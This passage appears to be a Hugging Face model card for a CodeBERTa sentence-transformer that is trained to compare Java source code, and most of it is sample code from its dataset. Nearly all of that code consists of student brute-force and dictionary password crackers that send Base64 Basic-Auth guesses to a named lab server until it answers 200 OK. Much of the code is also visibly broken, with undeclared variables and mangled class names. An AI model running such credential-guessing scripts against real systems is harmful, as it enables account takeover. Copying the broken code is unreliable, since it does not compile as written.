\ Dictionary {\n\n public static void main(String args[])\n {\n int i,j,k;\n\
\ String pass = new String();\n String UserPass = new String();\n String status\
\ = new String();\n String status1 = new String();\n BasicAuth auth = new BasicAuth();\n\
\ URLConnection connect;\n int start,end,diff;\n try {\n URL\
\ url = new URL (\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n\n\n\n \
\ start =System.currentTimeMillis();\n\n BufferedReader dis =\
\ new BufferedReader(new FileReader(\"words\"));\n\n\n while ((pass =\
\ dis.readLine()) != null)\n {\n\n\n UserPass= auth.encode(\"\
\",pass);\n\n connect = url.openConnection();\n connect.setDoInput(true);\n\
\ connect.setDoOutput(true);\n\n connect.setRequestProperty(\"\
Host\",\"sec-crack.cs.rmit.edu.\");\n connect.setRequestProperty(\"\
Get\",\"/SEC/2/ HTTP/1.1\");\n connect.setRequestProperty(\"Authorization\"\
,\" \" + UserPass);\n connect.connect();\n status =connect.getHeaderField(0);\n\
\ status1 = status.substring( 9,12);\n if (status.equalsIgnoreCase(\"\
HTTP/1.1 200 OK\"))\n {\n System.out.println(\"Password\
\ is \" + pass);\n end=System.currentTimeMillis();\n \
\ diff = end - start;\n System.out.println(\"Time Taken = \" + (diff/1000)\
\ + \" secs\");\n System.exit(0);\n }\n \
\ ((HttpURLConnection)connect).disconnect();\n connect = null;\n\
\ }\n\n System.out.println(\" match found\");\n\n \
\ dis.close();\n dis=null;\n\n connect = null;\n\n\
\ }\n\n catch (MalformedURLException malerr)\n {\n System.err.println(\"\
Unable Open URL\" + malerr);\n }\n\n catch (Exception ioerr)\n {\n System.err.println(\"\
Unable open file\" + ioerr);\n }\n\n\n\n\n }\n}"
- "import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public class Dictionary\
\ {\n\n URLConnection conn = null;\n private static boolean status = false;\n\
\n public static void main (String args[]){\n Dictionary a = new Dictionary();\n\
\ String[] inp = {\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\",\n \
\ \t\t\t\t \"\",\n \t\t\t\t \"\"};\n File file = new File(\"words\");\n\
\ exit:\n try {\n\t\t BufferedReader in = new BufferedReader(new FileReader(file));\n\
\t\t int attempt = 0;\n\t\t inp[2] = in.readLine();\n\t\t while (inp[2] != null)\
\ {\n\t\n\t\t\t if (inp[2].length() <= 3) {\n\t\t\t \tattempt++;\n\t\t\t \ta.doit(inp);\n\
\ \t\t \tif (status) {\n\t\t\t \t\t System.out.println(\"Crrect password is:\
\ \" + inp[2]);\n\t\t\t \t\t System.out.println(\"Number of attempts = \" + attempt);\n\
\t\t\t \t\t break exit;\n\t\t\t \t}\n\t\t \t }\n\t\t\t inp[2] = in.readLine();\n\
\ \t\t}\n\t } catch (FileNotFoundException e1) {\n\t\t \n\t\tSystem.err.println(\"\
File not found: \" + file);\n\t} catch (IOException e2) {\n\t\t\n\t\te2.printStackTrace();\n\
\t}\n\n }\n\n public void doit(String args[]) {\n \n try {\n \
\ BufferedReader in = new BufferedReader(\n new InputStreamReader\n\
\ (connectURL(new URL(args[0]), args[1], args[2])));\n String\
\ line;\n while ((line = in.readLine()) != null) {\n System.out.println(line);\n\
\ status = true;\n }\n }\n catch (IOException e)\
\ {\n \n }\n }\n\n public InputStream connectURL (URL url, String\
\ uname, String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setRequestProperty (\"Authorization\",\n userNamePasswordBase64(uname,pword));\n\
\ conn.connect ();\n return conn.getInputStream();\n }\n\n public\
\ String userNamePasswordBase64(String username, String password) {\n return\
\ \" \" + base64Encode (username + \":\" + password);\n }\n\n private final\
\ static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n\
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n '4', '5', '6',\
\ '7', '8', '9', '+', '/'\n };\n\n private static String base64Encode (String\
\ string) {\n String encodedString = \"\";\n byte bytes [] = string.getBytes\
\ ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n \
\ byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i\
\ >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length)\
\ {\n b3 = 0;\n pad = 1;\n }\n else\n\
\ b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n\
\ byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2\
\ & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n switch\
\ (pad) {\n case 0:\n encodedString += base64Array [c3];\n \
\ encodedString += base64Array [c4];\n break;\n case 1:\n\
\ encodedString += base64Array [c3];\n encodedString += \"=\"\
;\n break;\n case 2:\n encodedString += \"==\";\n \
\ break;\n }\n }\n return encodedString;\n }\n }\n\n"
- "\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\nimport java.util.*;\n\
\npublic class BruteForce {\n public static void main (String[] args) throws IOException\
\ {\n BufferedReader stdin = new BufferedReader (new InputStreamReader(System.in));\n\
\n int start = new Date().getTime();\n String[] letters = {\"a\",\"\
A\",\"b\",\"B\",\"c\",\"C\",\"d\",\"D\",\"e\",\"E\",\"f\",\"F\",\"g\",\"G\",\n\
\ \"h\",\"H\",\"i\",\"I\",\"j\",\"J\",\"k\",\"K\",\"\
l\",\"L\",\"m\",\"M\",\"n\",\"N\",\n\t\t\t \"o\",\"O\",\"p\",\"P\",\"q\",\"Q\"\
,\"r\",\"R\",\"s\",\"S\",\"t\",\"T\",\"u\",\"U\",\n\t\t\t \"v\",\"V\",\"w\",\"\
W\",\"x\",\"X\",\"y\",\"Y\",\"z\",\"Z\"};\n int len = 52;\n int total\
\ = 52;\n String[] cad = new String[total];\n int t=0;\n \n \
\ for (int i=0;i<=len-1;i++){\n\t cad[t] = letters[i];\n\t t++;\n } \n\
\ for (int i=0;i<=len-1;i++){\n for (int j=0;j<=len-1;j++){\n\t \
\ cad[t] = letters[j]+letters[i];\n\t t++;\n }}\n for (int i=0;i<=len-1;i++){\n\
\ for (int j=0;j<=len-1;j++){\n for (int k=0;k<=len-1;k++){\n\t \
\ cad[t] = letters[k]+letters[j]+letters[i];\n\t t++;\n }}}\n \
\ \n int response = 0;\n for (t=0;t<=total-1;t++){\n String\
\ uname = \"\";\n String userinfo = uname + \":\" + cad[t];\n try{\n\
\ String encoding = new url.misc.BASE64Encoder().encode (userinfo.getBytes());\n\
\ URL url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n \
\ HttpURLConnection uc = (HttpURLConnection)url.openConnection();\n \
\ uc.setRequestProperty (\"Authorization\", \" \" + encoding);\n response\
\ = uc.getResponseCode();\n\t if (response == 200) break;\n\t else uc.disconnect();\n\
\ }\n catch(IOException e){ System.err.println(e); e.printStackTrace();\
\ } \n catch(IllegalStateException s){ System.err.println(s); s.printStackTrace();\
\ }\n }\n System.out.println(\"Response \"+t+\" was \"+response);\n\
\ System.out.println(\"The successful password was \"+cad[t]);\n \
\ finish = new Date().getTime();\n float totaltime = (float)(finish-start)/1000;\n\
\ System.out.println(\"Total time: \"+totaltime+\" seconds\");\n }\n}\n\
\n"
- source_sentence: "import java.net.*;\nimport java.io.*;\n\npublic class BruteForce\
\ {\n private String strUserName;\n private String strURL;\n private int iAttempts;\n\
\ \n public BruteForce(String strURL,String strUserName) {\n this.strURL\
\ = strURL;\n this.strUserName = strUserName;\n this.iAttempts = 0 ;\n\n\
\ }\n \n public String getPassword(){\n URL u;\n String result =\"\
\";\n PassGenBrute PG = new PassGenBrute(3);\n URLConnection uc;\n \
\ String strPassword = new String();\n String strEncode;\n try{\n\
\ while (result.compareTo(\"HTTP/1.1 200 OK\")!=0){\n \n \
\ strEncode = PG.getNewPassword();\n u = new URL(strURL);\n \
\ uc = u.openConnection();\n uc.setDoInput(true);\n uc.setDoOutput(true);\n\
\ strPassword = strEncode;\n strEncode = strUserName + \":\"\
\ + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n\
\ uc.setRequestProperty(\"Authorization\",\" \" + strEncode);\n \
\ \n result = uc.getHeaderField(0);\n uc = null;\n \
\ u = null;\n iAttempts++;\n }\n\n }\n catch (Exception\
\ me) {\n System.out.println(\"MalformedURLException: \"+me);\n }\n\
\ return(strPassword);\n }\n \n public int getAttempts(){\n return\
\ (iAttempts);\n };\n \n public static void main (String arg[]){\n timeStart\
\ = 0;\n timeEnd = 0;\n \n if (arg.length == 2) {\n BruteForce\
\ BF = new BruteForce(arg[0],arg[1]);\n System.out.println(\"Processing\
\ ... \");\n timeStart = System.currentTimeMillis();\n \n System.out.println(\"\
Password = \" + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n\
\ System.out.println(\"Total Time Taken = \" + (timeEnd - timeStart) + \"\
\ (msec)\");\n System.out.println(\"Total Attempts = \" + BF.getAttempts());\n\
\ }\n else {\n System.out.println(\"[Usage] java BruteForce <URL>\
\ <USERNAME>\");\n\n }\n\n }\n}\n\nclass PassGenBrute {\n private char[]\
\ password;\n public PassGenBrute(int lenght) {\n password = new char[lenght];\n\
\ for (int i = 0; i < lenght; i++){\n password[i] = 65;\n }\n password[0]--;\n\
\ }\n \n public String getNewPassword()\n throws PasswordFailureException{\n\
\ password[0]++;\n\n try {\n for (int i=0; i<password.length ; i++){\n\
\ if (password[i] == 90) {\n password[i] = 97;\n }\n \
\ if (password[i] > 122) {\n password[i] = 65;\n password[i+1]++;\n\
\ }\n }\n }\n catch (RuntimeException re){\n throw new\
\ PasswordFailureException ();\n }\n return new String(password);\n }\n\
}\n\nclass PasswordFailureException extends RuntimeException {\n\n public PasswordFailureException()\
\ {\n }\n}"
sentences:
- "import java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary {\n private\
\ String strUserName;\n private String strURL;\n private String strDictPath;\n\
\ private int iAttempts;\n\n \n public Dictionary(String strURL,String\
\ strUserName,String strDictPath) {\n this.strURL = strURL;\n this.strUserName\
\ = strUserName;\n this.iAttempts = 0 ;\n this.strDictPath = strDictPath;\n\
\ }\n \n\n public String getPassword(){\n URL u;\n String result\
\ =\"\";\n PassGenDict PG = new PassGenDict(3,strDictPath);\n URLConnection\
\ uc;\n String strPassword = new String();\n String strEncode;\n \
\ try{\n while (result.compareTo(\"HTTP/1.1 200 OK\")!=0){\n \n\
\ strEncode = PG.getNewPassword();\n u = new URL(strURL);\n\
\ uc = u.openConnection();\n uc.setDoInput(true);\n \
\ uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode\
\ = strUserName + \":\" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n\
\ uc.setRequestProperty(\"Authorization\",\" \" + strEncode);\n \
\ \n result = uc.getHeaderField(0);\n uc = null;\n \
\ u = null;\n iAttempts++;\n }\n\n }\n catch (Exception\
\ me) {\n System.out.println(\"MalformedURLException: \"+me);\n }\n\
\ return(strPassword);\n }\n \n public int getAttempts(){\n return\
\ (iAttempts);\n };\n \n public static void main(String arg[]){\n timeStart\
\ = 0;\n timeEnd = 0;\n \n if (arg.length == 3) {\n Dictionary BF\
\ = new Dictionary(arg[0],arg[1],arg[2]);\n\n System.out.println(\"Processing\
\ ... \");\n timeStart = System.currentTimeMillis();\n System.out.println(\"\
Password = \" + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n\
\ System.out.println(\"Total Time Taken = \" + (timeEnd - timeStart) + \" (msec)\"\
);\n System.out.println(\"Total Attempts = \" + BF.getAttempts());\n }\n\
\ else {\n System.out.println(\"[Usage] java BruteForce <URL> <USERNAME>\
\ <Dictionary path>\");\n\n }\n\n }\n}\n\n\nclass PassGenDict {\n\n private\
\ char[] password;\n private String line;\n int iPassLenght;\n private BufferedReader\
\ inputFile;\n public PassGenDict(int lenght, String strDictPath) {\n try{\n\
\ inputFile = new BufferedReader(new FileReader(strDictPath));\n }\n \
\ catch (Exception e){\n }\n iPassLenght = lenght;\n }\n \n public\
\ String getNewPassword()\n throws PasswordFailureException{\n try {\n \
\ {\n line = inputFile.readLine();\n }while (line.length() !=\
\ iPassLenght);\n\n }\n catch (Exception e){\n throw new PasswordFailureException\
\ ();\n }\n return (line);\n }\n}\n\nclass PasswordFailureException extends\
\ RuntimeException {\n\n public PasswordFailureException() {\n }\n}"
- "\n\n\n\n\nimport java.io.IOException;\nimport java.net.*;\n\nimport java.io.*;\n\
import java.util.*;\n\n\n\npublic class Dictionary\n\n{\n\n\n static URL url\
\ = null;\n static URLConnection urlConnection;\n static InputStream urlStream;\n\
\n static String strOneLetterWords[];\n static String strTwoLetterWords[];\n\
\ static String strThreeLetterWords[];\n\n static String strExceptionPassword[];\n\
\n static String strLastPasswordTested;\n static String username = \"\";\n\
\n static int intNumberOfOneLetterWords = 0;\n static int intNumberOfTwoLetterWords\
\ = 0;\n static int intNumberOfThreeLetterWords = 0;\n\n static int intExceptionCount\
\ = -1;\n\n static int intNumberOfConnectionAttempts = 0;\n static int intTotalNumberOfWordsInFile\
\ = 0;\n\n\n\n\n public static void main (String args[])\n \n {\n\n\n \
\ \n \n Calendar calStart;\n Calendar calFinish; \n\
\ Date dateStart;\n Date dateFinish;\n lngStart;\n lngFinish;\n\
\n\n\n String strLine;\n String strTextFileName = \"/usr/share/lib/dict/words\"\
;\n\n boolean boolPasswordFound = false;\n boolean boolExceptionPasswordsTestedAgain\
\ = false;\n\n\n\n\n String urlString\n = \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
;\n\n int intCounter1;\n int intCounter2;\n int intCounter3;\n\n\
\ int intTotalNumberOfWordsChecked = 0;\n\n\n\n \n \n \
\ calStart = new GregorianCalendar();\n dateStart = calStart.getTime();\n\
\ lngStart = dateStart.getTime(); \n\n\n\n \n \n\
\ \n \n \n strExceptionPassword = new String[5000];\n\
\n\n \n \n getNumberOfVariousLengthsOfWords(strTextFileName);\n\
\n\n \n \n strOneLetterWords = new String[intNumberOfOneLetterWords];\n\
\ strTwoLetterWords = new String[intNumberOfTwoLetterWords];\n strThreeLetterWords\
\ = new String[intNumberOfThreeLetterWords];\n\n\n \n \n \
\ populateTheDifferentLengthArrays(strTextFileName);\n\n\n\n\n if (!boolPasswordFound)\
\ \n {\n\n\n \n \n\n intCounter1 = 0;\n\n \
\ while ( (!boolPasswordFound) && (intCounter1 < intNumberOfOneLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n boolPasswordFound\
\ = passwordWasFound(urlString,\n \
\ strOneLetterWords[intCounter1],\n \
\ boolPasswordFound);\n\n intCounter1++;\n\n intTotalNumberOfWordsChecked++;\n\
\n }\n\n\n\n \n \n\n intCounter1 = 0;\n\n\
\ while ( (!boolPasswordFound) && (intCounter1 < intNumberOfTwoLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n boolPasswordFound\
\ = passwordWasFound(urlString,\n \
\ strTwoLetterWords[intCounter1],\n \
\ boolPasswordFound);\n\n intCounter1++;\n\n intTotalNumberOfWordsChecked++;\n\
\n }\n\n\n\n \n \n\n intCounter1 = 0;\n\n\
\ while ( (!boolPasswordFound) && (intCounter1 < intNumberOfThreeLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n boolPasswordFound\
\ = passwordWasFound(urlString,\n \
\ strThreeLetterWords[intCounter1],\n \
\ boolPasswordFound);\n\n intCounter1++;\n\n \
\ intTotalNumberOfWordsChecked++;\n\n }\n\n\n\n \n \
\ \n \n\n intCounter1 = 0;\n\n while ( (!boolPasswordFound)\
\ && (intCounter1 < intNumberOfOneLetterWords) )\n {\n\n intCounter2\
\ = 0; \n\n while ( (!boolPasswordFound) && (intCounter2 < intNumberOfOneLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n \
\ boolPasswordFound \n = passwordWasFound(urlString,\n \
\ strOneLetterWords[intCounter1] + \n \
\ strOneLetterWords[intCounter2],\n \
\ boolPasswordFound); \n\n intCounter2++;\n\
\n intTotalNumberOfWordsChecked++;\n\n }\n\n\n \
\ intCounter1++;\n\n }\n\n\n\n \n \n \
\ \n \n \n\n intCounter1 = 0;\n\n while\
\ ( (!boolPasswordFound) && (intCounter1 < intNumberOfOneLetterWords) )\n \
\ {\n\n intCounter2 = 0; \n\n while ( (!boolPasswordFound)\
\ && (intCounter2 < intNumberOfOneLetterWords) )\n {\n\n \
\ intCounter3 = 0; \n\n while ( (!boolPasswordFound) && (intCounter3\
\ < intNumberOfOneLetterWords) )\n {\n\n boolPasswordFound\
\ = true;\n\n boolPasswordFound \n = passwordWasFound(urlString,\n\
\ strOneLetterWords[intCounter1] \
\ + \n strOneLetterWords[intCounter2]\
\ +\n strOneLetterWords[intCounter3],\n\
\ boolPasswordFound); \n\n \
\ intCounter3++;\n\n intTotalNumberOfWordsChecked++;\n\
\n }\n\n\n intCounter2++;\n\n }\n\n\n \
\ intCounter1++;\n\n }\n\n\n\n \n \n \
\ \n\n intCounter1 = 0;\n\n while ( (!boolPasswordFound)\
\ && (intCounter1 < intNumberOfOneLetterWords) )\n {\n\n intCounter2\
\ = 0; \n\n while ( (!boolPasswordFound) && (intCounter2 < intNumberOfTwoLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n \
\ boolPasswordFound \n = passwordWasFound(urlString,\n \
\ strOneLetterWords[intCounter1] + \n \
\ strTwoLetterWords[intCounter2],\n \
\ boolPasswordFound); \n\n intCounter2++;\n\
\n intTotalNumberOfWordsChecked++;\n\n }\n\n\n \
\ intCounter1++;\n\n }\n\n\n\n \n \n \
\ \n\n intCounter1 = 0;\n\n while ( (!boolPasswordFound)\
\ && (intCounter1 < intNumberOfTwoLetterWords) )\n {\n\n intCounter2\
\ = 0; \n\n while ( (!boolPasswordFound) && (intCounter2 < intNumberOfOneLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n \
\ boolPasswordFound \n = passwordWasFound(urlString,\n \
\ strTwoLetterWords[intCounter1] + \n \
\ strOneLetterWords[intCounter2],\n \
\ boolPasswordFound); \n\n intCounter2++;\n\
\n intTotalNumberOfWordsChecked++;\n\n }\n\n\n \
\ intCounter1++;\n\n }\n\n\n\n \n \n \
\ \n \n \n\n intCounter1 = 0;\n\n while\
\ ( (!boolPasswordFound) && (intCounter1 <= intExceptionCount) )\n {\n\
\n boolExceptionPasswordsTestedAgain = true;\n boolPasswordFound\
\ = true;\n\n boolPasswordFound \n = passwordWasFound(urlString,\n\
\ strExceptionPassword[intCounter1],\n \
\ boolPasswordFound); \n\n intCounter1++;\n\
\n intTotalNumberOfWordsChecked++;\n\n }\n\n } \n\n\n\
\n \n \n calFinish = new GregorianCalendar();\n dateFinish\
\ = calFinish.getTime();\n lngFinish = dateFinish.getTime(); \n\n\n\
\ \n \n System.out.println();\n System.out.println();\n\
\n\n System.out.println();\n System.out.println(\"Length of time for\
\ processing: \" + \n ((lngFinish - lngStart) / 1000)\
\ + \n \" seconds\");\n\n\n System.out.println();\n\
\ System.out.println(\"Total number of words in dictionary file = \" + intTotalNumberOfWordsInFile);\n\
\n\n System.out.println();\n System.out.println(\"Input file: number\
\ of words with one letter length = \" + intNumberOfOneLetterWords);\n \
\ System.out.println(\"Input file: number of words with two letter length =\
\ \" + intNumberOfTwoLetterWords);\n System.out.println(\"Input file: number\
\ of words with three letter length = \" + intNumberOfThreeLetterWords);\n\n\n\
\ System.out.println();\n System.out.println(\"Number of connection\
\ attempts = \" + intTotalNumberOfWordsChecked);\n\n\n System.out.println();\n\
\ System.out.println(\"Number of exceptions thrown = \" + (intExceptionCount\
\ + 1));\n System.out.println();\n\n\n if (intExceptionCount >= 0)\n\
\ {\n System.out.print(\"These passwords WERE \");\n\n if\
\ (boolExceptionPasswordsTestedAgain)\n System.out.print(\"tested again.\"\
);\n else\n System.out.print(\"NOT tested again.\");\n\n \
\ System.out.println();\n }\n\n\n if (boolPasswordFound) \n \
\ {\n System.out.println(\"The correct password WAS found - this password\
\ is '\" + \n strLastPasswordTested + \"'.\");\n \
\ } \n else\n {\n System.out.println(\"The correct password\
\ WAS NOT found.\");\n } \n \n System.out.println();\n\n\
\ }\n\n\n\n\n\n\n\n static void getNumberOfVariousLengthsOfWords(String TextFileName)\n\
\ \n {\n\n FileReader reader;\n BufferedReader inTextFile = null;\n\
\n String strLine;\n int intWordLength;\n\n\n\n try\n { \
\ \n \n \n \n \n \n reader\
\ = new FileReader(TextFileName);\n\n \n \n \n\
\ \n inTextFile = new BufferedReader(reader);\n\n\n \
\ strLine = inTextFile.readLine();\n\n\n while (strLine != null)\n \
\ {\n\n intTotalNumberOfWordsInFile++;\n\n strLine\
\ = strLine.trim();\n\n intWordLength = strLine.length();\n\n\n \
\ \n \n if (intWordLength == 1)\n \
\ intNumberOfOneLetterWords++;\n\n \n \n \
\ else if (intWordLength == 2) \n intNumberOfTwoLetterWords++;\n\
\n \n \n else if (intWordLength == 3)\n\
\ intNumberOfThreeLetterWords++;\n\n\n strLine = inTextFile.readLine();\n\
\n }\n\n }\n\n catch(FileNotFoundException e)\n {\n\n \
\ \n \n System.out.println();\n System.out.println(\"\
The file '\" + TextFileName + \"' cannot found.\");\n System.out.println();\n\
\n }\n\n catch(Exception e)\n {\n\n }\n\n finally\n \
\ {\n\n try\n {\n inTextFile.print();\n \
\ }\n catch(Exception e)\n {\n }\n\n inTextFile\
\ = null;\n reader = null;\n\n }\n\n } \n\n\n\n\n\n\n static\
\ void populateTheDifferentLengthArrays(String TextFileName)\n \n {\n\n \
\ FileReader reader;\n BufferedReader inTextFile = null;\n\n String\
\ strLine;\n int intWordLength;\n\n int intCountOfOneLetterWords =\
\ -1;\n int intCountOfTwoLetterWords = -1;\n int intCountOfThreeLetterWords\
\ = -1;\n\n\n\n try\n { \n \n \n \n \
\ \n \n reader = new FileReader(TextFileName);\n\n \
\ \n \n \n \n inTextFile = new\
\ BufferedReader(reader);\n\n\n strLine = inTextFile.readLine();\n\n\n\
\ while (strLine != null)\n {\n\n strLine = strLine.trim();\n\
\ intWordLength = strLine.length();\n\n\n \n \
\ \n if (intWordLength == 1)\n {\n intCountOfOneLetterWords++;\n\
\ strOneLetterWords[intCountOfOneLetterWords] = strLine;\n \
\ }\n\n \n \n else if (intWordLength\
\ == 2) \n {\n\n intCountOfTwoLetterWords++;\n \
\ strTwoLetterWords[intCountOfTwoLetterWords] = strLine;\n \
\ }\n\n \n \n else if (intWordLength ==\
\ 3)\n {\n intCountOfThreeLetterWords++;\n \
\ strThreeLetterWords[intCountOfThreeLetterWords] = strLine;\n \
\ }\n\n strLine = inTextFile.readLine();\n\n }\n\n }\n\
\n catch(FileNotFoundException e)\n {\n\n \n \n\
\ System.out.println();\n System.out.println(\"The file '\" +\
\ TextFileName + \"' cannot found.\");\n System.out.println();\n\n \
\ }\n\n catch(Exception e)\n {\n System.out.println(\"Exception\
\ thrown....\");\n System.err.println(e);\n }\n\n finally\n\
\ {\n\n try\n {\n inTextFile.print();\n \
\ }\n catch(Exception e)\n {\n }\n\n inTextFile\
\ = null;\n reader = null;\n\n }\n\n }\n\n\n\n\n\n\n\n static\
\ boolean passwordWasFound(String urlString,\n \
\ String password,\n boolean retVal)\n \
\ \n {\n\n String strEncodeInput = username + \":\" + password;\n \
\ boolean returnValue = retVal;\n boolean boolExceptionThrown = false;\n\n\
\n\n try\n {\n\n strLastPasswordTested = password;\n \n \
\ intNumberOfConnectionAttempts++;\n\n url = new URL(urlString);\n\
\n String encoding = new url.misc.BASE64Encoder().encode (strEncodeInput.getBytes());\n\
\n\n System.out.print(\"username = \" + \n username\
\ + \n \" \" +\n \
\ \"password = \" +\n password);\n\n\n\n HttpURLConnection\
\ urlConnection = (HttpURLConnection)url.openConnection();\n\n urlConnection.setRequestProperty(\"\
Authorization\", \n \" \" + encoding);\
\ \n\n System.out.println(\" response = \" + urlConnection.getResponseCode());\n\
\n if (urlConnection.getResponseCode() == 401)\n {\n \
\ returnValue = false; \n }\n\n }\n\n catch (MalformedURLException\
\ m)\n {\n boolExceptionThrown = true;\n returnValue = false;\n\
\n System.err.println(m);\n System.out.println(\"Malformed URL\
\ Exception error\");\n }\n\n catch (IOException io)\n {\n \
\ boolExceptionThrown = true;\n returnValue = false;\n\n System.out.println(\"\
IOException error\");\n System.err.println(io); \n }\n\n catch\
\ (Exception e)\n {\n boolExceptionThrown = true;\n returnValue\
\ = false;\n\n System.out.println(\"General exception.....\");\n \
\ System.err.println(e); \n }\n\n finally\n { \n urlConnection\
\ = null;\n url = null; \n }\n\n\n if (boolExceptionThrown)\n\
\ {\n intExceptionCount++;\n strExceptionPassword[intExceptionCount]\
\ = password;\n }\n\n\n return returnValue;\n\n }\n\n}"
- "import java.util.*;\nimport java.io.*;\nimport javax.swing.text.html.*;\n\n\n\
public class WatchDog {\n\n public WatchDog() {\n\n }\n public static void\
\ main (String args[]) {\n DataInputStream newin;\n\n try{\n System.out.println(\"\
ishti\");\n\n System.out.println(\"Downloading first copy\");\n Runtime.getRuntime().exec(\"\
wget http://www.cs.rmit.edu./students/ -O oldfile.html\");\n String[] cmdDiff\
\ = {\"//sh\", \"-c\", \"diff oldfile.html newfile.html > Diff.txt\"};\n \
\ String[] cmdMail = {\"//sh\", \"-c\", \"mailx -s \\\"Diffrence\\\" \\\"@cs.rmit.edu.\\\
\" < Diff.txt\"};\n while(true){\n Thread.sleep(24*60*60*1000);\n\
\ System.out.println(\"Downloading new copy\");\n Runtime.getRuntime().exec(\"\
wget http://www.cs.rmit.edu./students/ -O newfile.html\");\n Thread.sleep(2000);\n\
\ Runtime.getRuntime().exec(cmdDiff);\n Thread.sleep(2000);\n\
\ newin = new DataInputStream( new FileInputStream( \"Diff.txt\"));\n\
\ if (newin.readLine() != null){\n System.out.println(\"\
Sending Mail\");\n Runtime.getRuntime().exec(cmdMail);\n \
\ Runtime.getRuntime().exec(\"cp newfile.html oldfile.html\");\n\n \
\ }\n }\n\n }\n catch(Exception e){\n e.printStackTrace();\n\
\ }\n\n }\n\n}"
datasets:
- buelfhood/SOCO_TRAIN_java
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on huggingface/CodeBERTa-small-v1
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) on the [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) <!-- at revision e93b5898cff07f03f1c1c09cde284d1b85962363 -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
- **Training Dataset:**
- [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java)
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CODEBERTA-MNRL-TRIPLETS-E1-B16")
# Run inference
sentences = [
'import java.net.*;\nimport java.io.*;\n\npublic class BruteForce {\n private String strUserName;\n private String strURL;\n private int iAttempts;\n \n public BruteForce(String strURL,String strUserName) {\n this.strURL = strURL;\n this.strUserName = strUserName;\n this.iAttempts = 0 ;\n\n }\n \n public String getPassword(){\n URL u;\n String result ="";\n PassGenBrute PG = new PassGenBrute(3);\n URLConnection uc;\n String strPassword = new String();\n String strEncode;\n try{\n while (result.compareTo("HTTP/1.1 200 OK")!=0){\n \n strEncode = PG.getNewPassword();\n u = new URL(strURL);\n uc = u.openConnection();\n uc.setDoInput(true);\n uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode = strUserName + ":" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n uc.setRequestProperty("Authorization"," " + strEncode);\n \n result = uc.getHeaderField(0);\n uc = null;\n u = null;\n iAttempts++;\n }\n\n }\n catch (Exception me) {\n System.out.println("MalformedURLException: "+me);\n }\n return(strPassword);\n }\n \n public int getAttempts(){\n return (iAttempts);\n };\n \n public static void main (String arg[]){\n timeStart = 0;\n timeEnd = 0;\n \n if (arg.length == 2) {\n BruteForce BF = new BruteForce(arg[0],arg[1]);\n System.out.println("Processing ... ");\n timeStart = System.currentTimeMillis();\n \n System.out.println("Password = " + BF.getPassword());\n timeEnd = 